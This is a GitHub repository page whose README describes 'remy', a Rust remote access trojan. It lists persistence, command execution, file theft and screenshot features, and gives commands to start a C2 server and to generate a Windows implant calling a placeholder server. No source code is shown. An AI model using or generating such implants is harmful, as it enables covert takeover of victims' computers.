Skip to content

Latest commit

 

History

10 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

remy

A simple remote access trojan (RAT) written in Rust.

❗ Warning ❗

This project is strictly for educational/research purposes, any malicious activities that involve use of this repository is not the responsibility of the owner. ⚡ Ignore at your own risk! ⚡

Features

  • HTTP-based C2 communication
  • Cross-platform (Windows/Linux)
  • Command execution
  • File upload/download
  • Screenshot capture
  • Persistence mechanisms
  • Encrypted communications (AES-256-GCM)
  • Web UI dashboard
  • Troll commands (rickroll, speak, popup, wallpaper, mouse_chaos)

Building

cargo build --release

Usage

# Start the C2 server
remy server -p 8080

# Build a client payload
remy generate --os windows --c2 http://your-server:8080

Architecture

remy/
├── src/
│   ├── main.rs
│   ├── server/       # C2 server
│   ├── client/       # Implant/payload
│   ├── crypto/       # Encryption
│   └── commands/     # Available commands
└── Cargo.toml

License 📜

This project is licensed under the MIT License. See LICENSE for more information.

About

A remote access trojan written in Rust

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Used by

Contributors

Languages